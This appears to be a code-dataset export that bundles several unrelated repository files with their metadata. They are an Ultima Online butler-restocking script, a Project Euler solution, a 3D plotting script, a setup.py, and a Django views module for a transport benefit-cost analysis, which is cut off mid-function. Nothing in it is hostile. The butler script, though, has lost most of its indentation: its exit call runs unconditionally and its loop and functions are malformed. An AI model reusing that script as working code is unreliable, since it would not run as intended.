] |
kalpitan@gmail.com
|
caed78d6766fc3bd1951a808d82dd3a22ab5f2b2
|
cec0f1c7425c1cfcfefdae67d99ab5d14e37c34c
|
/Butler/ButlerHelper.py
|
8b184bbf7aa044baa7dcd557ed26846c65481b4e
|
[] |
no_license
|
SaintDismas1/Scripts
|
7e2ec1feebec14d343adb62cdc57318f23eea3f2
|
cd4a89e3e9b8f8a53979f607e366059fd209ee18
|
refs/heads/master
| 2023-08-02T19:29:25.050839
| 2021-09-15T12:37:18
| 2021-09-15T12:37:18
| 407,970,818
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 8,602
|
py
|
# ButlerHelper by Spatchel & Matsamilla
# use with ButlerProfiles.py for best results, update butlerID with butler serial below
# Last updated 3/16/21:
# • Cap option
# • Won't grab armor if layer is occupied
# • Stops if butler not found
# • Waits until in range of butler
###########################################################
# Add your butlers serial below #
###########################################################
butlerID = 0x0029C3D1 #add your butler serial here
###########################################################
# Option to equip armor, bag regs & bag pots below #
###########################################################
from System.Collections.Generic import List
import sys
# 4 = equip armor, 5 = bag regs, 6 = bag pots (switch = List[int]([0,4,5,6]) would do all)
switch = List[int]([0,4])
###########################################################
# If you dont run ButlerProfiles.py, this will load #
###########################################################
regs = 50 # default reg count if not profile
armor = 0 # default armor, 0=no 1=yes
cap = 0 # cap in default profile, 0=no 1=yes
bandies = 100 # default bandage count
arrows = 0
bolts = 0
######## NO TOUCHY BELOW THIS #############################
butler = Mobiles.FindBySerial(butlerID)
randomPause = 150
player_bag = Items.FindBySerial(Player.Backpack.Serial)
if butler == None:
    Player.HeadMessage(33, 'Butler not found, stopping')
sys.exit()
while Player.DistanceTo(butler) > 2.5:
if Timer.Check('butler') == False:
Mobiles.Message(butler,33, 'Come closer to restock.')
Timer.Create('butler',2500)
#moss
if Misc.CheckSharedValue('moss'):
moss6 = Misc.ReadSharedValue('moss')
else:
moss6 = regs
#ash count
if Misc.CheckSharedValue('ash'):
ash7 = Misc.ReadSharedValue('ash')
else:
ash7 = regs
# root count
if Misc.CheckSharedValue('root'):
root8 = Misc.ReadSharedValue('root')
else:
root8 = regs
# pearl count
if Misc.CheckSharedValue('pearl'):
pearl9 = Misc.ReadSharedValue('pearl')
else:
pearl9 = regs
#nightshade count
if Misc.CheckSharedValue('shade'):
shade10 = Misc.ReadSharedValue('shade')
else:
shade10 = regs
# Ginseng count
if Misc.CheckSharedValue('ginseng'):
ginseng11 = Misc.ReadSharedValue('ginseng')
else:
ginseng11 = regs
# Garlic Count
if Misc.CheckSharedValue('garlic'):
garlic12 = Misc.ReadSharedValue('garlic')
else:
garlic12 = regs
# Silk Count
if Misc.CheckSharedValue('silk'):
silk13 = Misc.ReadSharedValue('silk')
else:
silk13 = regs
# armor cap
if Misc.CheckSharedValue('cap'):
cap0 = Misc.ReadSharedValue('cap')
else:
cap0 = cap
# Armor
if Misc.CheckSharedValue('armor'):
armorS = Misc.ReadSharedValue('armor')
gorget1 = armorS
sleeves2 = armorS
gloves3 = armorS
tunic4 = armorS
legs5 = armorS
else:
cap0 = cap
gorget1 = armor
sleeves2 = armor
gloves3 = armor
tunic4 = armor
legs5 = armor
# Check if layer is taken, dont grab armor if is
layers = [ ('Head',0),('Neck',1), ('Arms',2), ('Gloves',3),('InnerTorso',4),('Pants',5) ]
for i in layers:
if Player.CheckLayer(i[0]):
if i[1] == 0:
cap0 = 0
elif i[1] == 1:
gorget1 = 0
elif i[1] == 2:
sleeves2 = 0
elif i[1] == 3:
gloves3 = 0
elif i[1] == 4:
tunic4 = 0
elif i[1] == 5:
legs5 = 0
# Explode Pots Count
if Misc.CheckSharedValue('exp'):
exp14 = Misc.ReadSharedValue('exp')
else:
exp14 = 0
# Strength Pots Count
if Misc.CheckSharedValue('str'):
str15 = Misc.ReadSharedValue('str')
else:
str15 = 0
# Refresh Pots Count
if Misc.CheckSharedValue('refresh'):
refresh16 = Misc.ReadSharedValue('refresh')
else:
refresh16 = 0
# Agility Pots Count
if Misc.CheckSharedValue('agil'):
agi17 = Misc.ReadSharedValue('agil')
else:
agi17 = 0
# Heal Pots Count
if Misc.CheckSharedValue('heal'):
heal18 = Misc.ReadSharedValue('heal')
else:
heal18 = 0
# Cure Pots Count
if Misc.CheckSharedValue('cure'):
cure19 = Misc.ReadSharedValue('cure')
else:
cure19 = 0
# Bandages Pots Count
if Misc.CheckSharedValue('bandies'):
bandages20 = Misc.ReadSharedValue('bandies')
else:
bandages20 = bandies
# Arrows
if Misc.CheckSharedValue('arrows'):
arrows24 = Misc.ReadSharedValue('arrows')
else:
arrows24 = arrows
# Bolts
if Misc.CheckSharedValue('bolts'):
bolts25 = Misc.ReadSharedValue('bolts')
else:
bolts25 = bolts
def dumpBottles():
    # hand empty bottles (ItemID 0x0F0E) back to the butler
    for i in player_bag.Contains:
        if i.ItemID == 0x0F0E:
            Items.Move(i, butlerID, 0)
            Misc.Pause(600)
def butler():
    # note: this def rebinds the module-level name `butler`; the mobile
    # object found earlier is only needed before this point
    global saveSwitch
Mobiles.UseMobile(butlerID)
Gumps.WaitForGump(989312372, 2000)
if Gumps.LastGumpTextExist( 'Remove Leather Tub?' ):
Misc.SendMessage('Leather Tub Detected')
saveSwitch = 5
withdrawSwitch = 8
else:
saveSwitch = 3
withdrawSwitch = 6
#################### Armor #######################################
textid = List[int]([0])
text = List[str]([str(cap0)])
saveProfile(textid, text)
textid = List[int]([1])
text = List[str]([str(gorget1)])
saveProfile(textid, text)
textid = List[int]([2])
text = List[str]([str(sleeves2)])
saveProfile(textid, text)
textid = List[int]([3])
text = List[str]([str(gloves3)])
saveProfile(textid, text)
textid = List[int]([4])
text = List[str]([str(tunic4)])
saveProfile(textid, text)
textid = List[int]([5])
text = List[str]([str(legs5)])
saveProfile(textid, text)
#################### REGS #######################################
# Moss
textid = List[int]([6])
text = List[str]([str(moss6)])
saveProfile(textid, text)
#Ash
textid = List[int]([7])
text = List[str]([str(ash7)])
saveProfile(textid, text)
#Root
textid = List[int]([8])
text = List[str]([str(root8)])
saveProfile(textid, text)
#Pearl
textid = List[int]([9])
text = List[str]([str(pearl9)])
saveProfile(textid, text)
#Nightshade
textid = List[int]([10])
text = List[str]([str(shade10)])
saveProfile(textid, text)
#Ginseng
textid = List[int]([11])
text = List[str]([str(ginseng11)])
saveProfile(textid, text)
#garlic
textid = List[int]([12])
text = List[str]([str(garlic12)])
saveProfile(textid, text)
#SpidersSilk
textid = List[int]([13])
text = List[str]([str(silk13)])
saveProfile(textid, text)
#################### Potions ###################################
#explode
textid = List[int]([14])
text = List[str]([str(exp14)])
saveProfile(textid, text)
#Strength
textid = List[int]([15])
text = List[str]([str(str15)])
saveProfile(textid, text)
#Refresh
textid = List[int]([16])
text = List[str]([str(refresh16)])
saveProfile(textid, text)
#Agility
textid = List[int]([17])
text = List[str]([str(agi17)])
saveProfile(textid, text)
#Heal
textid = List[int]([18])
text = List[str]([str(heal18)])
saveProfile(textid, text)
#Cure
textid = List[int]([19])
text = List[str]([str(cure19)])
saveProfile(textid, text)
#################### Bandages ###################################
textid = List[int]([20])
text = List[str]([str(bandages20)])
saveProfile(textid, text)
    #################### Petals #####################################
    textid = List[int]([23])
    text = List[str]([str(0)])
    saveProfile(textid, text)
    #################### Arrows/Bolts ###############################
    textid = List[int]([24])
    text = List[str]([str(arrows24)])
    saveProfile(textid, text)
    textid = List[int]([25])
    text = List[str]([str(bolts25)])
    saveProfile(textid, text)
Gumps.WaitForGump(989312372, 2000)
#Gumps.SendAction(989312372, withdrawSwitch)
Gumps.SendAdvancedAction(989312372, withdrawSwitch, switch)
def saveProfile(textid, text):
if Gumps.CurrentGump() != 989312372:
tempGump = Gumps.CurrentGump()
Gumps.CloseGump(tempGump)
Mobiles.UseMobile(butlerID)
Gumps.WaitForGump(989312372, 2000)
Gumps.SendAdvancedAction(989312372, saveSwitch, switch, textid, text)
Misc.Pause(randomPause)
dumpBottles()
butler()
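# Added sketch: the repeated "use the ButlerProfiles shared value if it
# exists, else fall back to the default" blocks above all follow one
# pattern; a hedged helper version (shared_or is a hypothetical name):
def shared_or(key, default):
    if Misc.CheckSharedValue(key):
        return Misc.ReadSharedValue(key)
    return default
# e.g. moss6 = shared_or('moss', regs); bandages20 = shared_or('bandies', bandies)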
|
[
"noreply@github.com"
] |
SaintDismas1.noreply@github.com
|
1c8f449c5acc848b57e4a84f8e91b355a581523f
|
9ae2918854d208780e247e5477b396bc99642ce6
|
/001-010/002.py
|
29bdb561039d50ca0f4d7312f4c3a10302c03eb3
|
[
"MIT"
] |
permissive
|
KKishikawa/project-euler-for-study-code
|
3ff45aadc5886dd8ff800fb3f81e0bffc943d3b8
|
fd46f1ee3211b5daa6d042cc993e55f631c9caac
|
refs/heads/master
| 2020-03-27T13:16:43.863976
| 2018-09-29T19:43:30
| 2018-09-29T19:43:30
| 146,600,216
| 0
| 0
|
MIT
| 2018-09-29T19:43:31
| 2018-08-29T12:58:55
|
JavaScript
|
UTF-8
|
Python
| false
| false
| 135
|
py
|
# Project Euler 002: sum of the even-valued Fibonacci terms <= 4,000,000
num1 = 1
num2 = 2
total = 0  # renamed from `sum` to avoid shadowing the built-in
while num2 <= 4_000_000:
    if num2 % 2 == 0:
        total += num2
    num1, num2 = num2, (num1 + num2)
print(total)
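# Added note: every third Fibonacci number is even, and the even terms
# satisfy E(n) = 4*E(n-1) + E(n-2) (2, 8, 34, 144, ...), so the parity
# check can be skipped; a hedged equivalent of the loop above:
def even_fib_sum(limit):
    a, b, total = 2, 8, 0
    while a <= limit:
        total += a
        a, b = b, 4 * b + a
    return total

print(even_fib_sum(4_000_000))  # same result as the loop above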
|
[
"noreply@github.com"
] |
KKishikawa.noreply@github.com
|
ce0bd4c4c561ed183c1da959ce765b324b251aeb
|
aaccadb5c766fa876b27ff6f2ac2a093f1ebb0c6
|
/arm/злые эксперименты/гыгага.py
|
9642b68a27ec65624da66bcc338173ec13cc8cd1
|
[] |
no_license
|
IvanLkt/Project_Copter
|
d1e6e6fcdb657a2b94342fb0be83f45e3385244f
|
db025dcd6ff49b12857ec2de010847a65504d881
|
refs/heads/master
| 2021-06-17T16:04:01.296310
| 2017-05-24T15:28:10
| 2017-05-24T15:28:10
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 511
|
py
|
# -*- coding: utf-8 -*-
import pylab
from mpl_toolkits.mplot3d import Axes3D
import numpy

# data.txt is read as tab-separated floats; judging by the slicing
# below, rows are assumed to cycle x, y, z, x, y, z, ...
file = open("data.txt", "r")
data = [list(map(float, line.split("\t"))) for line in file]

def makeData():
    # concatenate the rows into flat numpy arrays so .min()/.max() work
    x = numpy.concatenate(data[0::3])
    y = numpy.concatenate(data[1::3])
    z = numpy.concatenate(data[2::3])
    return x, y, z

if __name__ == '__main__':
    x, y, z = makeData()
    fig = pylab.figure()
    axes = Axes3D(fig)
    axes.plot_trisurf(x, y, z)
    pylab.xlim(x.min(), x.max())
    pylab.ylim(y.min(), y.max())
    pylab.show()
|
[
"noreply@github.com"
] |
IvanLkt.noreply@github.com
|
cba9fbb59dfa10a6e62ead5047d6642ff8fd5631
|
6dfe292a8fe86782108c92dcb4ea9736b3062852
|
/setup.py
|
147a3ec8b2d9dbdc21634cdeff44988e60d9fe2e
|
[] |
no_license
|
goldenberg/mnistified
|
30149568598214a147208c7c217f6eda66df24cb
|
0e30004200c5dca646a91f4701747f157908b851
|
refs/heads/master
| 2020-04-06T04:41:51.375585
| 2017-02-23T01:58:07
| 2017-02-23T01:58:07
| 82,869,415
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 341
|
py
|
from setuptools import setup
def parse_requirements(filename):
with open(filename) as f:
return f.readlines()
setup(
name='mnistified',
packages=['mnistified'],
include_package_data=True,
install_requires=parse_requirements('requirements.txt'),
    tests_require=parse_requirements('requirements_test.txt'),
)
|
[
"bgoldenberg@enlitic.com"
] |
bgoldenberg@enlitic.com
|
3e402b27515948d8ca5ba1cbffd6e8d5b25d05d1
|
a3ac8c00caa7f755ede8b9575d876b24a031efdb
|
/web/analysis/views.py
|
7ad2f057287b6a3b55d7ce499fc2ef67f29297c4
|
[] |
no_license
|
pschmied/benefit-cost-analysis
|
0b14e43ccec5de5aa87a06c36c103312d0651465
|
5659570fcc2a3bcc3f559c1e2747e80f4c00216e
|
refs/heads/master
| 2020-12-25T18:18:20.533731
| 2013-04-29T14:39:57
| 2013-04-29T14:39:57
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 43,279
|
py
|
from django.http import HttpResponseRedirect, HttpResponse
from django.shortcuts import render_to_response
from psrc.analysis.models import *
from psrc.analysis.calculations import *
from psrc.analysis.forms import *
from django import newforms as forms
from string import join, replace
from datetime import datetime
import csv
import re

# pattern for commify(): capture the leading digits and the final group
# of three, so repeated substitution inserts one separator per pass
_commify_regex = re.compile(r'^(-?\d+)(\d{3})')

def commify(num, separator=','):
    """commify(num, separator) -> string

    Return a string representing the number num with separator inserted
    for every power of 1000. Separator defaults to a comma.
    E.g., commify(1234567) -> '1,234,567'
    """
    num = '%.0f' % (num)  # just in case we were passed a numeric value
    more_to_do = 1
    while more_to_do:
        (num, more_to_do) = _commify_regex.subn(r'\1%s\2' % separator, num)
    return num
# Create your views here.
def analysis_router(request, next='main', use_function=True):
"""
router for the application
"""
# sends a redirect back to home if something is wack about the session
#checksession = _check_session(request)
#if not checksession[0]: return checksession[1]
views = {
'main':{'view':main,
'functions':['_update_analysis','_calculate_results']},
'time':{'view':time,
'functions':['_edit_time','_update_time']},
'distance':{'view':distance,
'functions':['_edit_distance','_update_distance']},
'accidents':{'view':accidents,
'functions':['_edit_safety','_update_safety']},
'emissions':{'view':emissions,
'functions':['_edit_emissions','_update_emissions']},
'unreliability':{'view':unreliability,
'functions':['_edit_unreliability','_update_unreliability']},
'main_report':{'view':main_report,
'functions':['_get_main_report']},
'benefit_type_report':{'view':benefit_type_report,
'functions':['_get_benefit_type_report']},
'tod_report':{'view':tod_report,
'functions':['_get_tod_report']},
'user_class_report':{'view':user_class_report,
'functions':['_get_user_class_report']},
'emissions_report':{'view':emissions_report,
'functions':['_get_emissions_report']},
'safety_report':{'view':safety_report,
'functions':['_get_safety_report']},
}
view = views[next]['view']
if use_function and request.method == 'POST':
for v in views:
for f in views[v]['functions']:
if f in request.POST:
view = views[v]['view']
# calls the function specified in the views dict and passes request to it
#if request.method == 'POST' and 'frompage' in request.POST:
# for i in views.keys():
# if i in request.POST:
# next = views[i]
#else:
# next = 'main'
return view(request)
def home(request):
return render_to_response(
'home.html',{
}
)
def main(request):
try:
analysis = Analysis.objects.get(id=request.session.get('analysis_id'))
except:
# brand new session
analysis = Analysis()
#save defaults to analysis
analysis.region = Region.objects.get(pk=1)
defaults = {}
defaults_temp = Default.objects.all().values()
for i in defaults_temp:
defaults[i['field']] = i['value']
for i in Analysis._meta.fields:
if defaults.has_key(i.name):
setattr(analysis,i.name, defaults[i.name])
analysis.save()
request.session['analysis_id'] = analysis.id
#save tod defaults
tod_defaults = TODDefault.objects.all().values()
for i in tod_defaults:
analysis_tod = AnalysisTOD()
analysis_tod.analysis = analysis
for j in TODDefault._meta.fields:
if j.name != 'id':
setattr(analysis_tod, j.name, i[j.name])
analysis_tod.save()
#save accident defaults
accident_defaults = AccidentDefault.objects.all().values()
for i in accident_defaults:
accident_input = AccidentInput()
accident_input.analysis = analysis
for j in AccidentDefault._meta.fields:
if j.name != 'id':
setattr(accident_input, j.name, i[j.name])
accident_input.save()
#accident_value_defaults = AccidentValueDefault.objects.all().values()
#for i in accident_value_defaults:
# accident_value_input = AccidentValueInput()
# accident_value_input.analysis = analysis
# accident_value_input.property_damage_only =
# accident_value_input.injury =
# accident_value_input.fatality =
#save emission defaults
emission_defaults = EmissionDefault.objects.all().values()
for i in emission_defaults:
emission_input = EmissionInput()
emission_input.analysis = analysis
for j in EmissionDefault._meta.fields:
if j.name != 'id':
if j.name == 'pollutant':
setattr(emission_input, 'pollutant_id', i['pollutant_id'])
else:
setattr(emission_input, j.name, i[j.name])
emission_input.save()
pollutants = Pollutant.objects.all()
for i in pollutants:
emission_cost_input = EmissionCostInput()
emission_cost_input.analysis = analysis
emission_cost_input.pollutant = i
emission_cost_input.cost = i.cost
emission_cost_input.save()
# get household from session household_id
analysis = Analysis.objects.get(id=request.session.get('analysis_id'))
analysis_dict = analysis.__dict__
if analysis_dict['out_year']:
analysis_dict['scenario'] = "%s_%s_%s" %(analysis_dict['scenario'], analysis_dict['scenario'].split('_')[0], analysis_dict['out_year'])
form = AnalysisFormMain(initial=analysis_dict)
updated = False
if (request.method == 'POST' and (
'_update_analysis' in request.POST or
'_calculate_results' in request.POST or
'_edit_time' in request.POST or
'_edit_distance' in request.POST or
'_edit_safety' in request.POST or
'_edit_emissions' in request.POST)):
#validate input
form = AnalysisFormMain(request.POST)
if form.is_valid():
user_scenario = form.cleaned_data['scenario']
user_scenario_spl = user_scenario.split('_')
if len(user_scenario_spl) > 2:
analysis.scenario = user_scenario_spl[0] + '_' + user_scenario_spl[1]
analysis.out_year = int(user_scenario_spl[3][:4])
else:
analysis.scenario = user_scenario
analysis.out_year = None
#analysis.scenario = form.cleaned_data['scenario']
analysis.region = form.cleaned_data['region_id']
analysis.title = form.cleaned_data['title']
analysis.analyst_name = form.cleaned_data['analyst_name']
analysis.inflation_rate = form.cleaned_data['inflation_rate']
analysis.fraction_of_base = form.cleaned_data['fraction_of_base']
analysis.real_discount_rate = form.cleaned_data['real_discount_rate']
analysis.growth_rate = form.cleaned_data['growth_rate']
#analysis.out_year = form.cleaned_data['out_year']
analysis.end_year = form.cleaned_data['end_year']
analysis.save()
updated = True
if '_calculate_results' in request.POST:
#run calcs
calc_basic(analysis.id)
calc_emissions(analysis.id)
calc_accidents(analysis.id)
if analysis.out_year:
calc_basic(analysis.id, dynamic=1)
calc_emissions(analysis.id, dynamic=1)
calc_accidents(analysis.id, dynamic=1)
interpolate(analysis.id)
                if analysis.region.id != 1:
                    calc_basic(analysis.id, all_regions = 0)
                    if analysis.out_year:
                        # mirror the full-region branch above: the out-year pass is the dynamic one
                        calc_basic(analysis.id, all_regions = 0, dynamic=1)
return analysis_router(request, next='main_report', use_function=False)
elif '_edit_time' in request.POST:
return analysis_router(request, next='time')
elif '_edit_distance' in request.POST:
return analysis_router(request, next='distance')
elif '_edit_safety' in request.POST:
return analysis_router(request, next='accidents')
elif '_edit_emissions' in request.POST:
return analysis_router(request, next='emissions')
return render_to_response(
'main.html',{
'form':form,
'updated':updated,
}
)
def time(request):
#analysis = Analysis.objects.get(id=request.session.get('analysis_id'))
#form = TimeForm(initial=analysis.__dict__)
#updated = False
#if (request.method == 'POST' and ('_update_time' in request.POST)):
# #validate input
# form = TimeForm(request.POST)
# if form.is_valid():
# analysis.hbw_drive_income_1 = form.cleaned_data['hbw_drive_income_1']
# analysis.hbw_drive_income_2 = form.cleaned_data['hbw_drive_income_2']
# analysis.hbw_drive_income_3 = form.cleaned_data['hbw_drive_income_3']
# analysis.hbw_drive_income_4 = form.cleaned_data['hbw_drive_income_4']
# analysis.other_driving = form.cleaned_data['other_driving']
# analysis.sr2_income_am = form.cleaned_data['sr2_income_am']
# analysis.sr2_income_md = form.cleaned_data['sr2_income_md']
# analysis.sr2_income_pm = form.cleaned_data['sr2_income_pm']
# analysis.sr2_income_ev = form.cleaned_data['sr2_income_ev']
# analysis.sr2_income_nt = form.cleaned_data['sr2_income_nt']
# analysis.sr3_income_am = form.cleaned_data['sr3_income_am']
# analysis.sr3_income_md = form.cleaned_data['sr3_income_md']
# analysis.sr3_income_pm = form.cleaned_data['sr3_income_pm']
# analysis.sr3_income_ev = form.cleaned_data['sr3_income_ev']
# analysis.sr3_income_nt = form.cleaned_data['sr3_income_nt']
# analysis.vanpool_income_am = form.cleaned_data['vanpool_income_am']
# analysis.vanpool_income_md = form.cleaned_data['vanpool_income_md']
# analysis.vanpool_income_pm = form.cleaned_data['vanpool_income_pm']
# analysis.vanpool_income_ev = form.cleaned_data['vanpool_income_ev']
# analysis.vanpool_income_nt = form.cleaned_data['vanpool_income_nt']
# analysis.hbw_transit_ivt_income_1 = form.cleaned_data['hbw_transit_ivt_income_1']
# analysis.hbw_transit_ivt_income_2 = form.cleaned_data['hbw_transit_ivt_income_2']
# analysis.hbw_transit_ivt_income_3 = form.cleaned_data['hbw_transit_ivt_income_3']
# analysis.hbw_transit_ivt_income_4 = form.cleaned_data['hbw_transit_ivt_income_4']
# analysis.hbw_transit_walk_income_1 = form.cleaned_data['hbw_transit_walk_income_1']
# analysis.hbw_transit_walk_income_2 = form.cleaned_data['hbw_transit_walk_income_2']
# analysis.hbw_transit_walk_income_3 = form.cleaned_data['hbw_transit_walk_income_3']
# analysis.hbw_transit_walk_income_4 = form.cleaned_data['hbw_transit_walk_income_4']
# analysis.hbw_transit_wait_income_1 = form.cleaned_data['hbw_transit_wait_income_1']
# analysis.hbw_transit_wait_income_2 = form.cleaned_data['hbw_transit_wait_income_2']
# analysis.hbw_transit_wait_income_3 = form.cleaned_data['hbw_transit_wait_income_3']
# analysis.hbw_transit_wait_income_4 = form.cleaned_data['hbw_transit_wait_income_4']
# analysis.other_transit_ivt = form.cleaned_data['other_transit_ivt']
# analysis.other_transit_walk = form.cleaned_data['other_transit_walk']
# analysis.other_transit_wait = form.cleaned_data['other_transit_wait']
# analysis.light_trucks_time = form.cleaned_data['light_trucks_time']
# analysis.medium_trucks_time = form.cleaned_data['medium_trucks_time']
# analysis.heavy_trucks_time = form.cleaned_data['heavy_trucks_time']
# analysis.bike_time = form.cleaned_data['bike_time']
# analysis.walk_time = form.cleaned_data['walk_time']
# analysis.save()
# updated = True
# return analysis_router(request, next='main', use_function=False)
#
#return render_to_response(
# 'time.html',{
# 'form':form,
# 'updated':updated,
# }
#)
analysis = Analysis.objects.get(id=request.session.get('analysis_id'))
toddefaults = TODDefault.objects.all()
toddefault_dict = {}
for i in toddefaults.values():
toddefault_dict[i['field']] = i
field_list = toddefault_dict.keys()
analysis_tod = AnalysisTOD.objects.filter(analysis=analysis)
analysis_tod_dict = {}
for result in analysis_tod.values():
analysis_tod_dict[result['field']] = result
dynamic_fields = {}
for field in analysis_tod_dict.keys():
for tod in analysis_tod_dict[field].keys():
if tod not in ('id','field','analysis_id'):
dynamic_fields['%s_%s' %(field,tod)] = analysis_tod_dict[field][tod]
form = TimeForm(obj=dynamic_fields, field_list=field_list)
updated = False
if (request.method == 'POST' and ('_update_time' in request.POST)):
#validate input
form = TimeForm(obj=request.POST, field_list=field_list)
if form.is_valid():
#save changes
for i in analysis_tod:
for tod in analysis_tod_dict[i.field].keys():
if tod not in ('id','field','analysis_id'):
setattr(i, tod, form.cleaned_data['%s_%s' %(i.field, tod)])
i.save()
return analysis_router(request, next='main', use_function=False)
form_rows = []
fields = analysis_tod_dict.keys()
fields.sort()
for field in fields:
temp = {}
temp['field'] = toddefault_dict[field]['name']
for tod in analysis_tod_dict[field].keys():
if tod not in ('id','field','analysis_id'):
temp[tod] = form['%s_%s' %(field, tod)]
form_rows.append(temp)
return render_to_response(
'time.html',{
'form':form,
'form_rows': form_rows,
'updated':updated,
}
)
def distance(request):
analysis = Analysis.objects.get(id=request.session.get('analysis_id'))
form = DistanceForm(initial=analysis.__dict__)
updated = False
if (request.method == 'POST' and ('_update_distance' in request.POST)):
#validate input
form = DistanceForm(request.POST)
if form.is_valid():
analysis.auto_cost = form.cleaned_data['auto_cost']
analysis.light_trucks_cost = form.cleaned_data['light_trucks_cost']
analysis.medium_trucks_cost = form.cleaned_data['medium_trucks_cost']
analysis.heavy_trucks_cost = form.cleaned_data['heavy_trucks_cost']
analysis.save()
updated = True
return analysis_router(request, next='main', use_function=False)
return render_to_response(
'distance.html',{
'form':form,
'updated':updated,
}
)
def unreliability(request):
analysis = Analysis.objects.get(id=request.session.get('analysis_id'))
form = UnreliabilityForm(initial=analysis.__dict__)
updated = False
if (request.method == 'POST' and ('_update_unreliability' in request.POST)):
#validate input
form = UnreliabilityForm(request.POST)
if form.is_valid():
analysis.i_ratio = form.cleaned_data['i_ratio']
analysis.personal_discount_rate = form.cleaned_data['personal_discount_rate']
analysis.prob_not_meet_guar = form.cleaned_data['prob_not_meet_guar']
analysis.alpha = form.cleaned_data['alpha']
analysis.beta_1 = form.cleaned_data['beta_1']
analysis.beta_2 = form.cleaned_data['beta_2']
analysis.save()
updated = True
return analysis_router(request, next='main', use_function=False)
return render_to_response(
'unreliability.html',{
'form':form,
'updated':updated,
}
)
def accidents(request):
analysis = Analysis.objects.get(id=request.session.get('analysis_id'))
accidents = AccidentInput.objects.filter(analysis=analysis)
acc_dict = {}
for result in accidents.values():
if not acc_dict.has_key(result['vc_range']):
acc_dict[result['vc_range']] = {}
acc_dict[result['vc_range']][result['functional_class']] = {}
acc_dict[result['vc_range']][result['functional_class']]['property_damage_only'] = result['property_damage_only']
acc_dict[result['vc_range']][result['functional_class']]['injury'] = result['injury']
acc_dict[result['vc_range']][result['functional_class']]['fatality'] = result['fatality']
dynamic_fields = {}
for vc in vc_range_choices:
for fc in functional_class_choices:
dynamic_fields['property_damage_only_%s_%s' %(vc[0],fc[0])] = acc_dict[vc[0]][fc[0]]['property_damage_only']
dynamic_fields['injury_%s_%s' %(vc[0],fc[0])] = acc_dict[vc[0]][fc[0]]['injury']
dynamic_fields['fatality_%s_%s' %(vc[0],fc[0])] = acc_dict[vc[0]][fc[0]]['fatality']
form = AccidentsForm(obj=dynamic_fields)
updated = False
vc_range = vc_range_choices
fc_classes = functional_class_choices
cost_form = AccidentCostForm(initial=analysis.__dict__)
if (request.method == 'POST' and ('_update_safety' in request.POST)):
#validate input
form = AccidentsForm(obj=request.POST)
cost_form = AccidentCostForm(request.POST)
if form.is_valid() and cost_form.is_valid():
#save changes
for i in accidents:
setattr(i, 'property_damage_only', form.cleaned_data['property_damage_only_%s_%s' %(i.vc_range, i.functional_class)])
setattr(i, 'injury', form.cleaned_data['injury_%s_%s' %(i.vc_range, i.functional_class)])
setattr(i, 'fatality', form.cleaned_data['fatality_%s_%s' %(i.vc_range, i.functional_class)])
i.save()
analysis.property_damage_only = cost_form.cleaned_data['property_damage_only']
analysis.injury = cost_form.cleaned_data['injury']
analysis.fatality = cost_form.cleaned_data['fatality']
analysis.save()
return analysis_router(request, next='main', use_function=False)
form_rows = []
for vc in vc_range:
for fc in fc_classes:
temp = {}
temp['vc'] = vc[0]
temp['fc'] = fc[0]
temp['property_damage_only'] = form['property_damage_only_%s_%s' %(vc[0],fc[0])]
temp['injury'] = form['injury_%s_%s' %(vc[0],fc[0])]
temp['fatality'] = form['fatality_%s_%s' %(vc[0],fc[0])]
form_rows.append(temp)
return render_to_response(
'accidents.html',{
'form':form,
'vc_range':vc_range,
'fc_classes':fc_classes,
'form_rows': form_rows,
'cost_form':cost_form,
'updated':updated,
}
)
def emissions(request):
analysis = Analysis.objects.get(id=request.session.get('analysis_id'))
emmissions = EmissionInput.objects.filter(analysis=analysis)
emissions_cost = EmissionCostInput.objects.filter(analysis=analysis)
emm_dict = {}
for result in emmissions.values():
if not emm_dict.has_key(result['pollutant_id']):
emm_dict[result['pollutant_id']] = {}
emm_dict[result['pollutant_id']][result['speed_class']] = result
emm_cost_dict = {}
for result in emissions_cost.values():
emm_cost_dict[result['pollutant_id']] = result
dynamic_fields = {}
for p in emm_dict.keys():
for speed in speed_class_choices:
dynamic_fields['car_%s_%s' %(p,speed[0])] = emm_dict[p][speed[0]]['car']
dynamic_fields['light_truck_%s_%s' %(p,speed[0])] = emm_dict[p][speed[0]]['light_truck']
dynamic_fields['medium_truck_%s_%s' %(p,speed[0])] = emm_dict[p][speed[0]]['medium_truck']
dynamic_fields['heavy_truck_%s_%s' %(p,speed[0])] = emm_dict[p][speed[0]]['heavy_truck']
dynamic_cost_fields = {}
for p in emm_cost_dict.keys():
dynamic_cost_fields['pollutant_%s' %(p)] = emm_cost_dict[p]['cost']
form = EmissionsForm(obj=dynamic_fields)
cost_form = EmissionsCostForm(obj=dynamic_cost_fields)
if (request.method == 'POST' and ('_update_emissions' in request.POST)):
#validate input
form = EmissionsForm(obj=request.POST)
cost_form = EmissionsCostForm(obj=request.POST)
if form.is_valid() and cost_form.is_valid():
#save changes
for i in emmissions:
setattr(i, 'car', form.cleaned_data['car_%s_%s' %(i.pollutant_id, i.speed_class)])
setattr(i, 'light_truck', form.cleaned_data['light_truck_%s_%s' %(i.pollutant_id, i.speed_class)])
setattr(i, 'medium_truck', form.cleaned_data['medium_truck_%s_%s' %(i.pollutant_id, i.speed_class)])
setattr(i, 'heavy_truck', form.cleaned_data['heavy_truck_%s_%s' %(i.pollutant_id, i.speed_class)])
i.save()
for i in emissions_cost:
setattr(i, 'cost', cost_form.cleaned_data['pollutant_%s' %(i.pollutant_id)])
i.save()
return analysis_router(request, next='main', use_function=False)
form_rows = []
for p in emm_dict.keys():
for speed in speed_class_choices:
temp = {}
temp['p'] = Pollutant.objects.get(pk=p).name
temp['speed'] = speed[0]
temp['car'] = form['car_%s_%s' %(p,speed[0])]
temp['light_truck'] = form['light_truck_%s_%s' %(p,speed[0])]
temp['medium_truck'] = form['medium_truck_%s_%s' %(p,speed[0])]
temp['heavy_truck'] = form['heavy_truck_%s_%s' %(p,speed[0])]
form_rows.append(temp)
cost_form_rows = []
for p in emm_cost_dict.keys():
temp = {}
temp['p'] = Pollutant.objects.get(pk=p).name
temp['cost'] = cost_form['pollutant_%s' %(p)]
cost_form_rows.append(temp)
return render_to_response(
'emissions.html',{
'form_rows': form_rows,
'form':form,
'cost_form_rows': cost_form_rows,
'cost_form': cost_form
}
)
def add_region(request):
form = RegionForm()
if request.method == 'POST':
form = RegionForm(request.POST)
